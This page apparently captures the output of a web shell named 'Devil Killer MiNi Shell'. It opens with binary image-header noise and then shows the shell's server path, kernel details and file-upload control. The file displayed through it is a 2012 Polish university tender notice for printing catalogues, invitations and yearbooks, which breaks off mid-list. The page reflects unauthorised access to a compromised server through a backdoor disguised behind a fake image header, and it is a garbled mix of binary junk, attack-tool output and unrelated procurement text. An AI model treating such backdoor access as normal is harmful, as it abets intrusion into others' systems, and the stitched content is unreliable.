JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120123/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120123/21206-N-2012.html

<p class="kh_header"><b>Wrocław: USŁUGI DRUKU DLA ASP WE WROCŁAWIU - NR 1,
znak sprawy ZP-1/01/2012</b><br>
<b>Numer ogłoszenia: 21206 - 2012; data zamieszczenia: 23.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Sztuk Pięknych im. Eugeniusza Gepperta we Wrocławiu , pl. Polski 3/4, 50-156 Wrocław, woj. dolnośląskie, tel. 071 3438031 w. 233, faks 071 3431558.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.asp.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGI DRUKU DLA ASP WE WROCŁAWIU - NR 1,
znak sprawy ZP-1/01/2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZAKRES PRZEDMIOTU ZAMÓWIENIA:
Zadanie nr	1	Usługa druku
1.	DRUK KATALOGU WROCŁAWSKA SZKAOŁA GRAFIKI - 500 szt.
Zadanie nr	2	Usługa druku
1.	DRUK ZESZYTU RZEŹBIARSKIEGO NR 4 - 700 szt.
Zadanie nr	3	Usługa druku
1.	DRUK ZAPROSZEŃ-600 szt.
Zadanie nr	4	Usługa druku
1.	DRUK KATALOGU DO WYSTAWY TABLICA/BOARD W GALERII SZTUKI W LEGNICY - 300 szt.
2.	DRUK KATALOGU WYSTAWY ZBIOROWEJ OH MY GOD W GALERII MIEJSKIEJ WE WROCŁAWIU - 300 szt.
3.	DRUK PLAKATU WYSTAWY ZBIOROWEJ OH MY GOD W GALERII MIEJSKIEJ WE WROCŁAWIU - 50 szt.
Zadanie nr	5	Usługa druku
1.	DRUK ROCZNIKA KATEDRY SZTUKI MEDIÓW NR 1 2008/2009 - 300 szt.
2.	DRUK ROCZNIKA KATEDRY SZTUKI MEDIÓW NR 1 2009/2010 - 300 szt.
3.	DRUK ROCZNIKA KATEDRY SZTUKI MEDIÓW NR 1 2010/2011 - 300 szt.

Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2 do SIWZ.
Załącznik nr 2 do SIWZ stanowi treść oferty i nie podlega uzupełnianiu na podstawie art. 26 ust.3 ustawy Pzp.

Usługi druku realizowane będą zgodnie z projektem przedstawionym przez Zamawiającego. 

Wykonawca zobowiązany jest zrealizować przedmiot zamówienia i dostarczać do siedziby Zamawiającego na własny koszt i ryzyko.

Zamawiający zobowiązuje się do przekazania Wykonawcy materiałów w wersji gotowej do druku w formie elektronicznej przed terminem wykonania usługi.

Szczegółowe warunki i zasady realizacji umowy określa projekt umowy (załączniki nr 7 do SIWZ.

Zamawiający dopuszcza składanie ofert częściowych
Oferty częściowe mogą zostać złożone na każde z zadań wyodrębnionych przez Zamawiającego i oznaczonych odpowiednio numerami: zadanie nr 1, zadanie nr 2, zadanie nr 3, zadanie nr 4, zadanie nr 5.
Oferta na każde zadanie podlega odrębnej ocenie przez Zamawiającego.
Wykonawca musi złożyć ofertę na cały asortyment określony dla danego zadania..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.03.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień. 
W celu wykazania spełnienia przez Wykonawcę warunku Zamawiający żąda załączenia do oferty oświadczenia, Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. - złącznik nr 4 do SIWZ. 
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganego oświadczenia, według formuły: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy powinni wykazać, że należycie wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonują w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie co najmniej:
-dla zadania nr 1: jedna usługa druku katalogu, o łącznej wartości nie mniejszej niż 17 000 zł brutto w ramach jednej umowy; 
-dla zadania nr 2: jedna usługa druku obejmująca przedmiot zamówienia, o łącznej wartości nie mniejszej niż 1 900 zł brutto w ramach jednej umowy 
-dla zadania nr 3 jedna usługa druku obejmująca przedmiot zamówienia, o łącznej wartości nie mniejszej niż 6 000 zł brutto w ramach jednej umowy
-dla zadania nr 4 jedna usługa druku katalogu o łącznej wartości nie mniejszej niż 10 000 zł brutto w ramach jednej umowy 
-dla zadania nr 5 jedna usługa druku katalogu o łącznej wartości nie mniejszej niż 25 000 zł brutto w ramach jednej umowy  (wg. wzoru stanowiącego złącznik nr 5 do SIWZ.)
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganych oświadczeń i dokumentów, według formuły: spełnia/nie spełnia
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia na podstawie art. 23 ustawy, określony warunek jest spełniony, gdy podmioty składające wspólną ofertę spełniają je łącznie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
W celu wykazania spełnienia przez Wykonawcę warunku Zamawiający żąda załączenia do oferty oświadczenia, Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. - złącznik nr 4 do SIWZ. 
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganego oświadczenia, według formuły: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
W celu wykazania spełnienia przez Wykonawcę warunku Zamawiający żąda załączenia do oferty oświadczenia, Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. - złącznik nr 4 do SIWZ. 
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganego oświadczenia, według formuły: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
W celu wykazania spełnienia przez Wykonawcę warunku Zamawiający żąda załączenia do oferty oświadczenia, Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. - złącznik nr 4 do SIWZ. 
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganego oświadczenia, według formuły: spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Formularz oferty (załącznik nr 1 do SIWZ).
2)	Formularz szczegółowy opis przedmiotu zamówienia (załącznik nr 2 do SIWZ).
3)	Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów, na okres korzystania z nich przy wykonywaniu zamówienia, jeżeli Wykonawca polegać będzie na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.
4)	Pełnomocnictwo dla osoby/osób podpisującej/cych ofertę do podejmowania zobowiązań w imieniu Wykonawcy składającego ofertę, gdy prawo do podpisania oferty nie wynika z innych dokumentów do niej załączonych.
5)	W przypadku złożenia oferty wspólnej przez kilku Wykonawców należy przedstawić pełnomocnictwo ustanawiające pełnomocnika do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu o udzielenie niniejszego zamówienia i zawarcia umowy w sprawie zamówienia publicznego. Zaleca się, aby pełnomocnikiem był jeden z Wykonawców składających ofertę wspólną (Partnerów).Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Partnerów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.asp.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Akademia Sztuk Pięknych im. Eugeniusza Gepperta we Wrocławiu, 
Pl. Polski 3/4, 50-156 Wrocław, 
pok. 215a, II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.01.2012 godzina 10:00, miejsce: Akademia Sztuk Pięknych im. Eugeniusza Gepperta we Wrocławiu, 
Pl. Polski 3/4, 50-156 Wrocław, 
sekretariat Kanclerza (pok. 107, I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE NR 1 - USŁUGA DRUKU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> DRUK KATALOGU-WROCŁAWSKA SZKOŁA GRAFIKI	
1.	NAKŁAD (SZT.)	500
	2.	FORMAT   	24 x 29 cm
	3.	PAPIER	bezdrzewny matowy papier powlekany, do druku obrazów najwyższej  jakości (w kolorze i skali szarości) zapewniający równowagę między obrazem a tekstem
	4.	GRAMATURA	170g 
	5.	KOLOR	4/4 + lakier dyspersyjny
	6.	TECHNIKA DRUKU	druk offsetowy, min. 175 lpi, proof nakładowy
	7.	OKŁADKA/OPRAWA 	miękka, szyta, laminowana mat, 300 g, kolor  4/1
	8.	OBWOLUTA	laminowana mat, 300 g, kolor 2/1
	9.	ILOŚĆ STRON	160 
	10.	MAKSYMALNY TERMIN REALIZACJI	do 7 dni roboczych 
	11.	JĘZYK PUBLIKACJI	polski/angielski
	12.	ISBN	tak - nadaje ASP.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. JAKOŚĆ: PODKRYTERIUM-OKŁADKA, WKŁAD, OPRAWA - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE NR 2 - USŁUGA DRUKU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZESZYT RZEŹBIARSKI NR 4.
	1.	NAKŁAD (SZT.)	700
	2.	FORMAT   	A4
	3.	PAPIER	matowy, ecru
	4.	GRAMATURA	80 gr., spulchnienie 1,6
	5.	KOLOR	czarno-biały
	6.	TECHNIKA DRUKU	druk offsetowy
	7.	OKŁADKA/OPRAWA 	miękka, zeszytowa, brązowa-120 gr
	8.	ILOŚĆ STRON	36
	9.	MAKSYMALNY TERMIN REALIZACJI	do 10 dni roboczych 
	10.	JĘZYK PUBLIKACJI	polski
	11.	ISBN	tak - nadaje ASP.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE NR 3 -USŁUGA DRUKU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZAPROSZENIA	
1.	NAKŁAD (SZT.)	600
	2.	FORMAT   	Format po złożeniu 16x16 cm, po rozłożeniu 44 cm x16 cm
	3.	PAPIER	kreda mat
	4.	GRAMATURA	300g
	5.	KOLOR	3 kolory pantone
	6.	TECHNIKA DRUKU	sitodruk
	7.	OKŁADKA/OPRAWA 	projekt i skład
	8.	ILOŚĆ STRON	2
	9.	MAKSYMALNY TERMIN REALIZACJI	do 5 dni roboczych
	10.	JĘZYK PUBLIKACJI	polski
	11.	ISBN	nie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ZADANIE NR 4 - USŁUGA DRUKU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	KATALOG  DO WYSTAWY TABLICA/BOARD W GALERII SZTUKI W LEGNICY:
	1.	NAKŁAD (SZT.)	300
		2.	FORMAT   	23,5 x 16,5 cm
		3.	PAPIER	kreda mat
		4.	GRAMATURA	150g/m2
		5.	KOLOR	4+4 (cmyk)
		6.	TECHNIKA DRUKU	druk offsetowy
		7.	OKŁADKA/OPRAWA 	szyto-klejona, twarda, tektura lita 1,5 mm
		8.	OKLEJKA	2 strony, kolor 1 + 0 (pantone), papier km 150 g/m2, 1+0-FOLIA MAT
		9.	WYKLEJAK	4 strony bez nadruku
		10.	ILOŚĆ STRON	96
		11.	MAKSYMALNY TERMIN REALIZACJI	do 4 dni roboczych 
		12.	JĘZYK PUBLIKACJI	polski i angielski
		13.	ISBN	tak - nadaje ASP
		14.	INNE	Pakowanie: paczki zbiorcze 
2	KATALOG WYSTAWY ZBIOROWEJ OH MY GOD W GALERII MIEJSKIEJ WE WROCŁAWIU:
	1.	NAKŁAD (SZT.)	300
		2.	FORMAT   	22 x 27 cm
		3.	PAPIER	kreda mat
		4.	GRAMATURA	km 170g g/m2
		5.	KOLOR	4+4 (cmyk)
		6.	TECHNIKA DRUKU	druk offsetowy
		7.	OKŁADKA/OPRAWA 	zeszytowa
		8.	OBWOLUTA	Okładka - karton bs 250 g./m2, 4 + 0 ( cmyk ),
folia mat 1 + 0
		9.	OKLEJKA	4+0-FOLIA MAT
		10.	ILOŚĆ STRON	32
		11.	MAKSYMALNY TERMIN REALIZACJI	do 4 dni roboczych 
		12.	JĘZYK PUBLIKACJI	polski i angielski
		13.	ISBN	tak - nadaje ASP
3	PLAKAT WYSTAWY ZBIOROWEJ OH MY GOD W GALERII MIEJSKIEJ WE WROCŁAWIU:
	1.	NAKŁAD (SZT.)	50
		2.	FORMAT   	A2
		3.	PAPIER	kreda, powlekany jednostronny 
		4.	GRAMATURA	120g
		5.	KOLOR	4+4
		6.	TECHNIKA DRUKU	druk offsetowy
		7.	MAKSYMALNY TERMIN REALIZACJI	do 4 dni roboczych 
		8.	JĘZYK PUBLIKACJI	polski
		9.	ISBN	nie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> ZADANIE NR 5-USŁUGA DRUKU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	DRUK ROCZNIKA KATEDRY SZTUKI MEDIÓW 
NR 1 2008/2009:
	1.	NAKŁAD (SZT.)	300
		2.	FORMAT   	20 x 20 cm
		3.	PAPIER	kreda mat
		4.	GRAMATURA	150g/m2
		5.	KOLOR	4+4 (cmyk)
		6.	TECHNIKA DRUKU	druk offsetowy
		7.	OKŁADKA	karton 250g+folia mat
		8.	GRZBIET	klejony
		9.	ILOŚĆ STRON	64
		10.	MAKSYMALNY TERMIN REALIZACJI	do 14 dni roboczych 
		11.	JĘZYK PUBLIKACJI	polski 
		12.	ISBN	tak - nadaje ASP
2	DRUK ROCZNIKA KATEDRY SZTUKI MEDIÓW 
NR 1 2009/2010:
 
	1.	NAKŁAD (SZT.)	300
		2.	FORMAT   	20 x 20 cm
		3.	PAPIER	kreda mat
		4.	GRAMATURA	150g/m2
		5.	KOLOR	4+4 (cmyk)
		6.	TECHNIKA DRUKU	druk offsetowy
		7.	OKŁADKA	karton 250g+folia mat
		8.	GRZBIET	klejony
		9.	ILOŚĆ STRON	68
